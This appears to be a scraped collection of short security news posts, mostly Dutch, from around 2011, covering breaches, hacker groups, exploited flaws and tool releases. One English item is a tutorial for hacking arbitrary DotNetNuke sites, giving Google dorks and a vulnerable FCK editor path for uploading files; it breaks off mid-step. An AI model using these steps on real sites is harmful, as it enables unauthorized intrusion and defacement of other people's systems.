    De website Integriteitoverheid.nl is in handen van het Bureau Integriteitsbevordering Openbare Sector. Deze overheidsinstelling is opgericht om 'het publieke domein te stimuleren en ondersteunen bij het opzetten en implementeren van integriteitsbeleid'. Volgens de eigen website werken er acht mensen bij de organisatie.

    Tweakers.net ontving van hackers Thaxdevil en Goo echter de tip dat de website van de BIOS op het gebied van integriteit geen hoge ogen gooit. Via sql-injectie bleek de database van de hele website toegankelijk. In de database onder andere de nieuwsbriefadministratie en een tabel met gebruikersgegevens. Saillant detail is dat de wachtwoorden in deze tabel in plain text zijn opgeslagen en op een aanpassing van o in 0 en i in 1 identiek zijn aan de username.

    Inmiddels is het lek in de site gedicht, bevestigt een woordvoerster van de organisatie tegenover Tweakers.net. Het bureau neemt ook andere delen van de site onder de loep genomen om zich ervan te verzekeren dat er geen kwetsbaarheden over het hoofd zijn gezien.

    bron: Security.nl

  • Al zeker 100 duizend webshops die draaien op het open source framework osCommerce zijn gehackt. De aanval op de websites lijkt uit Oekraïne afkomstig.

    Bij een grote aanval op webshops die op het open source framework osCommerce draaien zijn al ongeveer 100 duizend sites gehackt. Bezoekers van besmette sites worden blootgesteld aan malware door een door de aanvallers geïnjecteerd iframe. Dat meldt beveiligingsbedrijf Amorize.

    Ouderwetse aanval

    De nog steeds voortdurende injectie-aanval lijkt afkomstig vanuit Oekraïne. Omdat de aanvallen in serie gebeuren lijkt het alsof de hackers een kwetsbaarheid in het framework gebruiken. Wayne Huang, cto bij Armorize vertelt tegen Webwerelds zusterwebsite Network World dat een aanval op websites niet ongewoon is maar dat deze specifieke aanval wel opvallend is.

    De manier waarop de aanvallers de webshops met dit framework massaal met malware injecteren doet namelijk sterk denken aan een ouderwetse aanval. Drie jaar geleden kwam die aanval, met geautomatiseerde hacktools die via botnets werken, nog zeer vaak voor. Inmiddels is dat niet meer zo gewoon.

    Moeilijk upgraden

    Ook Huang geeft aan dat aanvallers waarschijnlijk een kwetsbaarheid in osCommerce benutten. Hij voegt aan die opmerking toe dat dit soort aanvallers vaak in de gaten houden wat er wordt gedeeld over nieuw gevonden kwetsbaarheden in software. Bovendien zou het soms moeilijk zijn om osCommerce te updaten.

    Dat komt omdat in sommige zelfgemaakte lay-outs voor osCommerce bepaalde code hardcoded is opgenomen. Als die alleen correspondeert met oudere versies van de software kan een gebruiker pas upgraden als de code van het thema is aangepast.

    Honderdduizenden websites

    Volgens de website van osCommerce gebruiken bijna 250 duizend webshops het framework. Bijna de helft is dus al besmet door de aanvallers. In Nederland wordt de software vooral door kleinere webshops gebruikt. Sommige webhosters leveren een totaalpakket voor webshophouders gebaseerd op het framework.

    Network World heeft contact opgenomen met de groep achter osCommerce. Zij waren echter niet direct beschikbaar voor een reactie.

    B ron: webwereld.nl

  • Een hacker zal volgende week op hackersconferentie Black Hat een manier tonen om via sms het slot van een auto te openen. Volgens de hacker is veel apparatuur op mobiele netwerken niet goed beveiligd tegen aanvallen.

    Onder meer randapparatuur als energiemeters en zelfs watersystemen kunnen in theorie via het telefoonnetwerk worden overgenomen, zegt Don Bailey, die werkt bij beveiligingsbedrijf iSec. Bailey spreekt volgende week tijdens hackersconferentie Black Hat in Las Vegas. Volgens de onderzoeker is er bij apparatuur die is aangesloten op reguliere mobiele netwerken niet goed nagedacht over beveiliging.

    De hacker wil niet uit de doeken doen hoe hij precies te werk gaat, maar als een auto via 3g of lte is aangesloten op een mobiel netwerk, kan hij binnen enkele uren het alarmsysteem overnemen en de deuren ontgrendelen. Met andere apparatuur die op het netwerk zit aangesloten, zoals slimme energiemeters en watersystemen, heeft Bailey geen hacks uitgevoerd. Die zijn echter wel mogelijk, claimt de onderzoeker. Meer details komen naar buiten als Bailey zijn presentatie geeft op Black Hat.

    Bron: Tweakers.net

  • iphonedeathAlmost anyone can snoop the secure data traffic of unpatched iPhones and iPads using a recently-revised tool, a researcher said today as he urged owners to apply Apple's latest iOS fix.

    The nine-year-old bug was quashed Monday when Apple issued a patch for the iPhone 4, iPhone 3GS, and third- and fourth-generation iPod Touch.

     

    If those devices aren't patched, attackers can easily intercept and decrypt secure traffic -- the kind guarded by SSL, which is used by banks, e-tailers and other sites -- at a public Wi-Fi hotspot, said Chet Wisniewski, a security researcher with U.K.-based Sophos.

    "This is a nine-year-old bug that Moxie Marlinspike disclosed in 2002," said Wisniewski in an interview today.

    On Monday, Marlinspike released a revision of his long-available "sslsniff" traffic sniffing tool that allows a user to intercept SSL traffic from vulnerable iOS devices. "My mother could actually use this," said Wisniewski, alluding to the tool's simplicity.

    The bug Apple patched was in the parsing of SSL certificates on iOS, according to Wisniewski and the researchers Apple credited with reporting the flaw.

  •  Security Experts Wayne Huang, Chris Hsiao, NightCola Lin discovered that more than 100000 web pages are infected by mass iFrame attack. There's been a mass scale injection ongoing recently, with the injected iframe pointing to willysy.com .
    Just Try a simple Google Search to find out the facts.

    Video Demonstration:


    Researchers at Armorize said the injected scripts redirect users to malicious Web domains that is launching attacks targeting known vulnerabilities in Java, Adobe's PDF, Microsoft's Internet Explorer and other common platforms, according to the report by Armorize experts Wayne Huang, Chris Hsiao and NightCola Lin. The campaign is targeting online commerce sites, the researchers found.

    Read more at Source.
  • appleA security researcher has discovered a bug in the Mac Book. Security expert Charlie Miller, explained that the microcontroller that monitors the power level of Apple laptops can be compromised to run a malicious code on it. The researcher has found that the batteries’ microcontroller chips ship with default passwords. Once a hacker learns that password, they can learn to control the chips’ firmware and potentially hijack them. A hacker can well cause the laptop’s battery to explode.
    “These batteries just aren’t designed with the idea that people will mess with them,” Miller said. “What I’m showing is that it’s possible to use them to do something really bad.”
    “You could put a whole hard drive in, reinstall the software, flash the BIOS, and every time it would reattack and screw you over. There would be no way to eradicate or detect it other than removing the battery.” said Miller.
    Miller plans to publicly disclose the flaw, and provide a fix at the Black Hat security conference in August.

    Source: hackingtricks.in

  • Mantra is a collection of free and open source tools integrated into a web browser, which can become handy for students, penetration testers, web application developers,security professionals etc. It is portable, ready-to-run, compact and follows the true spirit of free and open source software.

    The software is lite, flexible, portable and user friendly with a nice graphical user interface. You can carry it in memory cards, flash drives, CD/DVDs, etc. It can be run natively on Linux, Windows and Mac platforms. It can also be installed on to your system within minutes. Mantra is absolutely free of cost and takes no time for you to set up.

    Mantra can be very helpful in performing all the five phases of attacks including reconnaissance, scanning and enumeration, gaining access, escalation of privileges, maintaining access, and covering tracks. Apart from that it also contains a set of tools targeted for web developers and code debuggers which makes it handy for both offensive security and defensive security related tasks.

    Download Here:
    http://getmantra.com/

  • Een vijf jaar oud beveiligingslek in Internet Explorer was de populairste aanvalsmethode voor cybercriminelen in het eerste kwartaal van dit jaar. Dat blijkt uit cijfers van beveiligingsbedrijf M86 Security. De kwetsbaarheid in kwestie betreft het Microsoft Data Access Components (MDAC) ActiveX control in Internet Explorer. Via een drive-by download kunnen aanvallers willekeurige code op het systeem van ongepatchte gebruikers uitvoeren en zo het volledige systeem overnemen. Het lek werd op 11 april 2006 door Microsoft gepatcht.

    Een negen jaar oud Office Web Components Active Script Execution-lek staat op de tweede plek van meest misbruikte beveiligingslekken. In het overzicht van de vijftien kwetsbaarheden, staan zes lekken in programma's van Microsoft, zes Adobe-lekken, twee Java-lekken en een lek in RealPlayer. De meeste exploits die cybercriminelen voor drive-by downloads gebruiken, zijn afkomstig uit 2009 (5), 2010 (4), 2007 (3) gevolgd door een enkele exploit uit 2008, 2006 en 2002.

    top _15_most_observed_vulneabilities
  • Hackers hebben 24.000 documenten buitgemaakt van een netwerk van een bedrijf dat in opdracht van het Amerikaanse ministerie van defensie werkt. Een deel was zeer gevoelig. Het Pentagon komt nu met een nieuwe beveiligingsstrategie.

    Bij een aanval op een militair bedrijf in maart hebben hackers 24.000 documenten ontfutseld. Dat heeft de Amerikaanse staatssecretaris van defensie William Lynn donderdag gezegd. Lynn zei niet om welk bedrijf het ging, maar er zouden onder andere documenten over vliegtuig- en satellietsystemen, netwerkbeveiligingsprotocollen en technologieën voor surveillance zijn buitgemaakt.

    Mogelijk gaat het om defensiebedrijf Lockheed Martin, waarvan bekend is dat het met beveiligingsproblemen kampte. Die problemen ontstonden nadat hackers toegang hadden verkregen tot het netwerk van beveiligingsbedrijf RSA en daardoor documenten over de werking van SecurID-sleutelgenerators konden buitmaken. De aanval op de RSA-systemen vond in maart plaats; dezelfde maand waarin de defensiedocumenten zijn gestolen.

    Het Pentagon wil niet aangeven wie achter de aanval zit, maar gedacht wordt dat het om een buitenlandse mogendheid gaat. Mogelijk zit China of Rusland achter de aanval; die landen zijn er door de Verenigde Staten vaker van beschuldigd hackaanvallen uit te voeren.

    De VS vrezen dat op den duur ook terroristische groeperingen dit soort aanvallen kunnen uitvoeren en hebben daarom een nieuwe digitale-beveiligingsstrategie gepresenteerd. Het Pentagon herhaalde dat het met 'militaire kracht' kan reageren op internetbedreigingen. Eerder al zei het ministerie dat het dergelijke bedreigingen kan opvatten als 'oorlogsdaad'.

    bron: tweakers.net

  • sql-injectionIn deze video laat ik zien hoe je de gehele inhoud van een database kunt dumpen, zoals mysqldump dat ook kan doen, door middel van SQL injectie.

    Deze video is niet zo geschikt voor beginners; je moet SQL injectie eigenlijk wel onder de knie hebben om dit goed te kunnen volgen. Gelukkig heeft Wilco daar een mooie video (http://www.security.nl) over gemaakt, dus bekijk die eerst.

    Bron: security.nl
  • AntiSecAntiSec, onderdeel van de lostvaste hackersgroepering Anonymous, claimt de database van het Amerikaanse militaire consultancybedrijf Booz Allen Hamilton te hebben gekraakt. Daarbij zou het tienduizenden mailadressen hebben buitgemaakt.

     

    De groep heeft onder de de slogan 'Military Meltdown Monday' circa 90.000 e-mailadressen van de firma gepubliceerd inclusief versleutelde wachtwoorden. In de dump, die als torrent wordt aangeboden, zouden zich inloggegevens bevinden van Amerikaans militair personeel van diverse legerafdelingen binnen de VS.

    Antisec claimt dat de beveiliging op de servers van Booz Allen Hamilton, die op zijn site 'robuuste cybersecurity-oplossingen' aanprijst, eenvoudig was te omzeilen. Toen de hackers eenmaal binnen waren, zouden zij via een eigen shell de databases van het bedrijf hebben weten te benaderen en daar de nodige informatie uit gehaald hebben. Antisec claimt ook 4GB aan broncode op de servers van Booz Allen Hamilton gewist te hebben.

  • mouseDe 'Trojaanse muis' van vorige week is slechts een voorbode van wat ons nog te wachten staat op gebied van fysieke hackmethoden - ieder hardwareapparaat dat aan een computer gehangen kan worden vormt een groot beveiligingsrisico.

    Veel computerwebsites hadden het over een slimme hack van Netragard waarbij een met malware geïnfecteerde microcontroller in Logitech USB-muis geplaatst werd om daarmee een netwerk binnen te dringen. De muis bevatte firmwarecode die automatisch uitgevoerd werd zodra een eindgebruiker het apparaat in de computer zou pluggen. In dit geval belde de 'kwaadaardige' code naar NetraGard om te laten weten dat het gelukt was het netwerk te infiltreren. Gelukt! Veel lezers waren zich er niet van bewust dat hardware, vooral iets pietluttigs als een muis, gebruikt kan worden om automatisch opstartende code in een computer te laden. Voor anderen kwam dit niet als verrassing.
  • Bedrijven moeten de websites Pastebin.com en Pastie.org gebruiken om te zien of ze gehackt zijn. De afgelopen maanden zijn tal van gehackte databases en documenten op beide websites verschenen. "Het in de gaten houden van deze websites kan helpen bij het identificeren van een lek in je organisatie", zegt beveiligingsexpert Lenny Zeltser. Ook beveiligingsbedrijven en pentesters kunnen de gegevens voor een pentratietestproject of een opvolgende aanval gebruiken.

    Volgens Zeltser zal een internet-gebaseerde pentester een aanval beginnen door publieke, gevoelige gegevens over het doelwit te verzamelen. Deze verkenningsfase zou de basis voor verdere aanvallen zijn. Websites als Pastebin kunnen interessante gegevens opleveren, zoals creditcardnummers, persoonlijke identificeerbare informatie, broncode, configuratiebestanden, gegevens van werknemers en wachtwoorden.

    Inmiddels zijn er verschillende tools, zoals een script, parser en webtool, die Pastebin kunnen doorzoeken. Er zijn echter nog veel meer van dit soort sites om te monitoren, zoals FrubarPaste, YourPaste, Codepad, Slexy en LodgeIt.
  • vsftpdEen aanvaller is erin geslaagd een backdoor in vsftpd te verstoppen, volgens de ontwikkelaar de "veiligste en snelste FTP-server voor UNIX-achtige systemen." Het gaat om een versie van de software die op de officiële website werd aangeboden. Vsftpd is ontwikkeld door Chris Evans, Google Chrome teamleider en beveiligingsonderzoeker. De aanvaller wist toegang tot de hostingomgeving te krijgen en heeft vervolgens het bestand aangepast.

    Evans merkt op dat de "payload" erg interessant is. Als antwoord op een smiley in de FTP-gebruikersnaam, wordt er een TCP callback shell geprobeerd. Daarnaast wordt de installatie van de aangepaste versie niet naar de aanvaller gecommuniceerd. "Het is daardoor onduidelijk hoe slachtoffers worden geïdentificeerd", laat Evans in deze analyse weten. Daarnaast zou dit ervoor zorgen dat andere aanbieders van de FTP-server de aanpassing ontdekken. "Daarom was het misschien iemand die het voor de 'lulz' deed en geen problemen wilde veroorzaken."

    Inmiddels heeft Evans vsftpd naar een andere hostingprovider verhuisd, namelijk appspot.com, wat een dienst van Google is. Voorheen was de website bij de Britse hostingprovider
    Mythic Beasts ondergebracht.
  • appleHackers claimen admingegevens van een website van Apple te hebben buitgemaakt. Het zou gaan om een site die werd gebruikt voor enquêtes. Dezelfde hackersgroep ontfutselde zondag logingevens van een Nederlandse datingsite.

    De hackersgroep AnonymousIRC claimt op Twitter admingegevens van een Apple-website te hebben gekraakt. Het gaat om loginnamen en versleutelde wachtwoorden; daartussen zitten ook de accountnamen 'root' en 'admin'. De buit betrof data die in de 'users'-tabel van mysql was opgeslagen.

    De groep omschrijft de kraak zelf als 'niet erg ernstig'. Volgens The New York Times gaat het om een website die door Apple werd gebruikt om enquêtes af te nemen. Er zijn voor zover bekend geen gegevens van klanten buitgemaakt.

    AnonymousIRC was afgelopen weekend ook verantwoordelijk voor het hacken van Pepper.nl, een datingsite van RTL. Een database-dump met onder andere e-mailadressen en gehashte wachtwoorden vond zijn weg naar Pastebin.

    Bron: Tweakers.net

  • hackerleaksDespite countless WikiLeaks copycats popping up since the secret-spilling site first dumped its cache of State Department cables last year, the new generation of leaking sites has produced few WikiLeaks-sized scoops. So instead of waiting for insider whistleblowers, the hacker movement Anonymous hopes that a few outside intruders might start the leaks flowing.

    Earlier this week members of the hacker collective, and specifically a sub-group known as the People’s Liberation Front, (PLF) launched two new leaking sites, LocalLeaks.tk (not to be confused with the similarly named Localeaks.com) and HackerLeaks.tk. Both hope to receive documents through an anonymous submissions channel, analyze them, and then distribute them to the press to get “maximum exposure and political impact.”

    But while LocalLeaks aims to use WikiLeaks’ model of insider sources to expose corruption on the local scale, HackerLeaks openly invites data thieves to upload documents through its submission system, so that they can be analyzed and publicized. “You download it, we’ll disclose it for you,” the site’s homepage reads, listing potential booty such as “databases, exploits, security flaws, documents, and email spools.”

    On Tuesday, according to one of the hackers involved who goes by the name Commander X, the leaking site got its first submission: a list of the personal details of Orlando officials including addresses, home values, incomes and other data. That “leak,” which Commander X says was submitted anonymously to HackerLeaks but was posted, confusingly, on LocalLeaks, comes as Anonymous has been engaged in what it calls “Operation Orlando.” Since early Tuesday hackers have been launching attacks on Orlando-based targets including OrlandoFloridaGuide.com and the websites of the Orlando Chamber of Commerce and Universal Studios in retaliation for arrests of Orlando workers for the non-profit Food Not Bombs who lacked permits.

  • SQL Injection is de gevaarlijkste fout die programmeurs kunnen maken, zo blijkt uit de Top 25 van gevaarlijkste softwarefouten van MITRE en het Sans Institute. De lijst bestaat uit veelvoorkomende fouten die tot ernstige beveiligingsproblemen in software kunnen leiden. "Ze zijn vaak eenvoudig te vinden en eenvoudig te misbruiken", aldus MITRE, een not-for-profit organisatie. De lekken zijn gevaarlijk omdat ze het overnemen van software, stelen van gegevens of het uitvoeren van een Denial of Service mogelijk maken.

    RankScoreIDName
    [1] 93.8 CWE-89 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
    [2] 83.3 CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
    [3] 79.0 CWE-120 Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')
    [4] 77.7 CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
    [5] 76.9 CWE-306 Missing Authentication for Critical Function
    [6] 76.8 CWE-862 Missing Authorization
    [7] 75.0 CWE-798 Use of Hard-coded Credentials
    [8] 75.0 CWE-311 Missing Encryption of Sensitive Data
    [9] 74.0 CWE-434 Unrestricted Upload of File with Dangerous Type
    [10] 73.8 CWE-807 Reliance on Untrusted Inputs in a Security Decision
    [11] 73.1 CWE-250 Execution with Unnecessary Privileges
    [12] 70.1 CWE-352 Cross-Site Request Forgery (CSRF)
    [13] 69.3 CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
    [14] 68.5 CWE-494 Download of Code Without Integrity Check
    [15] 67.8 CWE-863 Incorrect Authorization
    [16] 66.0 CWE-829 Inclusion of Functionality from Untrusted Control Sphere
    [17] 65.5 CWE-732 Incorrect Permission Assignment for Critical Resource
    [18] 64.6 CWE-676 Use of Potentially Dangerous Function
    [19] 64.1 CWE-327 Use of a Broken or Risky Cryptographic Algorithm
    [20] 62.4 CWE-131 Incorrect Calculation of Buffer Size
    [21] 61.5 CWE-307 Improper Restriction of Excessive Authentication Attempts
    [22] 61.1 CWE-601 URL Redirection to Untrusted Site ('Open Redirect')
    [23] 61.0 CWE-134 Uncontrolled Format String
    [24] 60.3 CWE-190 Integer Overflow or Wraparound
    [25] 59.9 CWE-759 Use of a One-Way Hash without a Salt

    Meer details zijn te vinden op de cwe website.

  • Een hackergroep genaamd D3V29 heeft tientallen inloggegevens voor PayPal en MySpace online gezet, die via onbeveiligde draadloze netwerken werden verzameld. Het gaat om 150 MySpace en 50 PayPal accounts, die in restaurants en winkels in de Verenigde Staten werden opgevangen. De groep maakte een eigen scanner die onversleutelde cookies onderschepte.

    Het Twitter-account van de groep is inmiddels geschorst, maar de groep is nog wel op dumpsite Pastebin actief. Daar staan ook de links naar de gestolen gegevens. Ook wordt er om Bitcoin donaties en geld voor een nieuwe server gevraagd.

    "We hebben onze cracking-machine gesloopt. We zoeken geld voor een nieuwe machine, zodat we eindelijk ons "Fuck Myspace, it's Facebook Now" project kunnen onthullen. Onze AntiSec-leden moeten ons hierbij helpen. We hopen dat je dit begrijpt." Vervolgens sluit de groep af met de slogan van anonymous. "We are Anonymous. We Never Forgive. We Never Forget. We Love You. We Are Legion."

    Bron: Security.nl

  • lulzsec2Na vijftig dagen zegt hackerscollectief LulzSec ermee te stoppen. De groep wist bij Sony, de Amerikaanse Senaat, televisiezender PBS en vele andere websites in te breken. Ook werden verschillende websites, waaronder die van de CIA, via Denial of Service-aanvallen platgelegd. "De afgelopen vijftig dagen hebben we bedrijven, overheden, zelfs de bevolking, en alles wat er mogelijk tussen valt, ontregeld en blootgesteld, gewoon omdat we het konden."

    In het afscheid dat de groep via Twitter aankondigde, maakt men zich ook sterk voor Operatie AntiSec. Een oorlogsverklaring gericht tegen beveiligingsbedrijven en overheden, waarbij men zoveel mogelijke vertrouwelijke documenten wil publiceren. "Achter het masker, achter de waanzin en chaos, geloven we echt in de AntiSec beweging."

  • Here I am explaining a new and simple way to hack any website with DNN(DotNetNuke). DotNetNuke is an open source platform for building web sites based on Microsoft .NET technology. It is easiest techniques to hack any website coompare than other technique Such as Cross Site Scripting and SQL injection. In this technique we reached the root path for any website and here we can easily upload our own file and can also replace the logo, text, images etc.
    Follow these steps to hack any website..
    1.  In our first step we check whether the Website is vulnerable or not by using google dorks.  Search following code in google.

    inurl:/portals/0

    If you can check your desired domain than use below code. Here we can change .com to any desired domain like as .net, .org etc

    inurl:/portals/0 site:.com

    2.  Now choose any website and copy the url of website without /portals/0 ,and paste the below code after it.

    Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

    For ex. the website ishttp://www.abc.com/portals/0
    remove the portals/0 and add the above code. It will become as http://www.abc.com/

  • duinrell_hackEen hacker die vorige week de website van attractiepark Duinrell kraakte, heeft de namen en e-mailadressen van meer dan 80 duizend mensen gestolen. De webdeveloper weet nog niet waar het lek zit.

    Een hacker met de schuilnaam Xcrypt0 heeft donderdagavond de website van attractiepark Duinrell gekraakt. Eerst leek hij de website slechts gedefaced te hebben, maar het weblog Looopings, voor attractieparkfanaten, weet nu te melden dat hij ook 80 duizend e-mailadressen en namen heeft buitgemaakt.

    'Reclamebureau is schuldig'

    De gestolen gegevens zijn afkomstig van mensen die zich hebben aangemeld voor de nieuwsbrief van het attractiepark. Xcrypt0 stuurde Looopings een screenshot van de database als bewijs van de hack. Ook zou dat weblog inmiddels de volledige lijst met e-mailadressen en namen in bezit hebben.

    Volgens de hacker is zijn inbraak grotendeels te wijten aan de gebrekkige beveiliging in het cms van reclamebureau Multiminded, dat de website van het attractiepark onderhoudt. “Het is ronduit belachelijk dat een groot bedrijf als Duinrell zo'n onhandige webdesigner heeft aangenomen. 90 procent van de sites van Multiminded is kwetsbaar”, meent hij.

  • THC-HYDRA v6.1 brute force tool ReleasedTHC-HYDRA is a very fast network logon cracker which support many different services. This tool is a proof of concept code, to give researchers and security consultants the possibility to show how easy it would be to gain unauthorized access from remote to a system. It was tested to compile cleanly on Linux, Windows/Cygwin, Solaris, FreeBSD and OSX.

    Changelog for thc-hydra v6.4
    Update SIP module to extract and use external IP addr return from server error to bypass NAT
    Update SIP module to use SASL lib
    Update email modules to check clear mode when TLS mode failed
    Update Oracle Listener module to work with Oracle DB 9.2
    Update LDAP module to support Windows 2008 active directory simple auth
    Fix to the connection adaptation engine which would loose planned attempts
    Fix make script for CentOS, reported by ya0wei
    Print error when a service limits connections and few pairs have to be tested
    Improved Mysql module to only init/close when needed
    Added patch from the FreeBSD maintainers
    Module usage help does not need a target to be specified anymore
    configure script now honors /etc/ld.so.conf.d/ directory

    Download THC-HYDRA v6.4
  • Een dinsdag gepatcht beveiligingslek in Adobe Flash Player wordt op grote schaal door aanvallers misbruikt voor het overnemen van Windows computers en infiltreren van systemen. De kwetsbaarheid werd eerst voor gerichte aanvallen gebruikt, maar wordt inmiddels ook voor aanvallen tegen doorsnee internetgebruikers ingezet. Het bezoeken van een kwaadaardige of gehackte website is voldoende om aanvallers volledige controle over de computer te geven.

    Volgens de Shadowserver Foundation, een organisatie die botnets in de gaten houdt, wordt het lek op "een vrij grote schaal" misbruikt. Exploits die het lek misbruiken, zijn inmiddels op tal van legitieme websites verschenen, waaronder verschillende non-gouvernementele organisaties, luchtvaartmaatschappijen, een Koreaanse nieuwssite, een Indiase overheidssite en een Taiwanese Universiteit.

    Doelwit
    Adobe Flash Player is op 99% van alle op het internet aangesloten computers aanwezig, waarbij het in Europa en de Verenigde Staten zelfs een penetratiegraad van 99,5% heeft. Het is dan ook niet verwonderlijk dat Flash de afgelopen regelmatig het doelwit van aanvallers is geweest. CVE-2011-0609, CVE-2011-0611, CVE-2011-0627, CVE-2011-2107 en CVE-2011-2110 zijn allemaal nummers die naar recente lekken wijzen, waardoor aanvallers toegang tot vertrouwelijke informatie hebben gekregen. Ook voor de aanval op beveiligingsbedrijf RSA werd een lek in Adobe Flash Player gebruikt. Lekken 0609 en 0611 zouden nog steeds op grote schaal voor gerichte aanvallen worden ingezet, ook al is een patch voor deze gaten al enige tijd beschikbaar.

    Het nieuwste lek, 2110, is alleen nog via drive-by download-aanvallen misbruikt. "De aanvallers hebben duidelijk hun aanvalsprofiel aan de beschikbare exploit aangepast. Dit is niet nieuw, maar de explosie van de exploit op het web en van zoveel verschillende bronnen is vrij bijzonder", aldus de organisatie. Beveiligingsbedrijf Websense merkt op dat het lek ook voor spear-phishing aanvallen wordt ingezet.
  • Last week I spoke at the Central Ohio ISSA Conference about Attacking and Defending Apple IOS Devices.  This talk was based on information gathered from several of the mobile pentests that I conducted at SecureState.  I’ll be working on more research that will be going into an white paper that I will hopefully be releasing in the next few months.  You can find my slides on SlideShare below and watch the video graciously recorded by Iron Geek.

  • lulzSecDe hackergroep genaamd 'LulzSec' die eerder verschillende websites van Sony hackte, is zelf gehackt. Aanvallers wisten de logs van de privé-IRC-server buit te maken. De informatie werd door ene 'LulzFail' op de Full-disclosure mailinglist gepubliceerd en bevat de logs van het chatkanaal. Ook zou één van de LulzSec-leden door de FBI zijn gearresteerd. Via Twitter en deze verklaring laat de groep weten dat het niet om belangrijke logs gaat en er niemand is aangehouden.

    LulzSec heeft inmiddels wel de broncode van het Sony Computer Entertainment Developer Network online gezet. Kort daarna telde de groep via Twitter 50.000 volgers en zou iemand 7.200 dollar aan BitCoins hebben gedoneerd. Inmiddels is het aantal volgers tot boven de 77.000 gestegen. Ook is de website van de hackergroep weer online, met een overzicht van alle hacks en online geplaatste bestanden.

    Bron: security.nl

  • Adam Dachis — If you've heard about the recent viral stunt put on the web site for the latest Batman film, you know it's possible to hide codes in an audio file. But did you know it's actually really easy to do? Here's how.

    To encode, you're going to need Coagula (Windows-only), and to decode you'll need Sonic Visualizer (Windows/Mac OS X/Linux). You can watch the video above for a visual walkthrough, but here are the steps you need to follow:

    1. Create an image you want to encode. White text on a black background works well, and it helps to have a small image without too much empty space. Save it out as a JPEG or BMP.
    2. Open the image in Coagula and click the setting for "Render Image as Audio Without Blue/Noise." Be sure to choose this option as the other rendering option will not work.
    3. When you're done a new audio file entitled "Coagula.wav" will be in the same folder as the Coagula application. You can either go grab that file or you can save it out to a location of your choice by choosing "Save Audio File" as from the file menu. That's it. Message encoded!
    4. To decode the message, open it in Sonic Visualizer. You'll see the audio spectrum but not the message. To view the message, go to the Layout menu and choose "Add Spectrogram" (any of the options in the submenu should be fine). You may need to adjust the way you're viewing it, but you should now be able to see your hidden message.

    Pretty cool! For more neat ways to hide secret messages in your files, check out our steganography guide.

    P.S. If you know any cross-platform tools for encoding the image as an audio file, please let us know in the comments.

  • Een hackergroep genaamd 'LulzSec' is erin geslaagd de openbare Amerikaanse televisiezender PBS volledig te hacken.
    De hackergroep "LulzSec" die de aanval uitvoerde, laat in een verklaring weten dat men een zero-day beveiligingslek in MoveableType 4 gebruikte. Toen de aanvallers toegang tot php shell hadden, werden verschillende PBS servers gehackt, waarop ongepatchte Linux-versies draaiden. Toegang tot het interne netwerk wist men dankzij het hergebruik van wachtwoorden door SSH-gebruikers te krijgen.

    De aanvallers wisten de databases met MySQL root-wachtwoorden, stations en wachtwoorden, perswachtwoorden, Frontline inloggegevens en inloggegevens van personeel te stelen, om die vervolgens online te zetten.
    "We hebben de servers gehackt. We hebben niet de inhoud op de servers vernietigd. Geen rm's. We hebben niet de homepage van pbs.org overgenomen, ook al konden we dat wel. Weet je hoe je dat noemt? klasse", aldus LulzSec.

    Verder werden ook verschillende pagina's gedefaced, waar onder andere tot het vrijlaten van Bradley Manning wordt opgeroepen. Manning wordt verdacht van het lekken van duizenden geheime Amerikaanse overheidsdocumenten aan WikiLeaks. Vorige week zond PBS een documentaire over Manning uit.
  • IT experts developed software that beat Captcha on eBay 82% of the time, Microsoft 48.9%, and Yahoo 45.5%

    captchas-gekraakt
    We all know that captcha is used on many website to protect spams. This is an attempt to ensure that the servie is being used by a human. But Now IT experts have developed a software that can beat captcha. Thi software beat captcha of various website upto a great success. It can also break captcha up to 89%.

    This program is named as decaptcha. The Decaptcha programme is able to defeat even the toughest schemes with just 20 minutes of ‘listening’ time to some 200 Captchas.
    Reasearchers warned the website owners to upgrade their captcha security. Because it can cause a great harm to web masters if this software is used against their websites.

     

    source: hackingtricks.in

  • codemasters-logo

    Hackers hebben vorige week de website van gameontwikkelaar Codemasters gekraakt en loginnamen en versleutelde wachtwoorden van beheerders ontfutseld. Codemasters haalde daarop zijn website offline en dichtte het lek.

     

    De hackaanval vond vorige week vrijdag plaats, schrijft GamesIndustry.biz, zonder toe te lichten hoe de hackers  toegang hebben gekregen. Duidelijk is alleen dat er loginnamen en versleutelde wachtwoorden van beheerders zijn buitgemaakt, en dat is geprobeerd om toegang te krijgen tot de beheerinterface van Codemasters.com.

    Daarop haalde de uitgever zijn complete website een paar uur offline. Nadat een beveiligingslek was gedicht, is de site weer in de lucht gebracht. Codemasters geeft niet aan of er gegevens van geregistreerde gebruikers zijn buitgemaakt. Wel zegt het bedrijf dat het zijn websites en systemen nu controleert op beveiliging.

    De aanval op Codemasters is naar het zich laat aanzien veel minder ernstig dan de aanval op Sony's PlayStation Network. Nog geen maand geleden werd het hele PlayStation Network offline gehaald, nadat hackers hadden ingebroken op het PSN en persoonsgegevens van gebruikers wisten buit te maken. Vorige week werd de dienst langzaam opnieuw gestart.

    bron: tweakers.net

  • Het Russische bedrijf ElcomSoft beweert dat het de encryptie van de iPhone heeft gekraakt. Onderzoekers wisten het versleutelde bestandssysteem van iOS 4 te ontsleutelen. "Dit klinkt als een klein succes, ElcomSoft is in feite het eerste bedrijf ter wereld dat dit doet", zegt CEO Vladimir Katalov. Het product waarin het Russische bedrijf de functionaliteit aanbiedt wordt alleen aan opsporings- en inlichtingendiensten beschikbaar gemaakt. "We zijn verantwoordelijke burgers, en willen niet dat deze technologie in de verkeerde handen valt."

    Met de komst van iOS 4 gebruikt Apple een hardwarematig encryptiesysteem genaamd Data Protection, dat de passcode van de gebruiker op een interne chip met 256-bit AES encryptie opslaat. Daarnaast wordt elk bestand op een iOS apparaat met een individuele sleutel beveiligd, die aan de hand van het unieke apparaat-ID (UID) is berekend.
  • WhatsApp-logoEr blijkt een fout in het verificatieproces van de populaire applicatie Whatsapp te zitten. Hierdoor is het mogelijk om mee te lezen met de chatberichten van iemand anders. Het enige dat nodig is, is een prepaid-telefoon zonder tegoed en wifi.

    Een tipgever van GeenStijl ontdekte een manier om de controle te omzeilen. Ondanks dat deze tipgever volgens het weblog Whatsapp drie keer heeft geprobeerd op de hoogte stellen van zijn ontdekken, werden er geen maatregelen genomen.

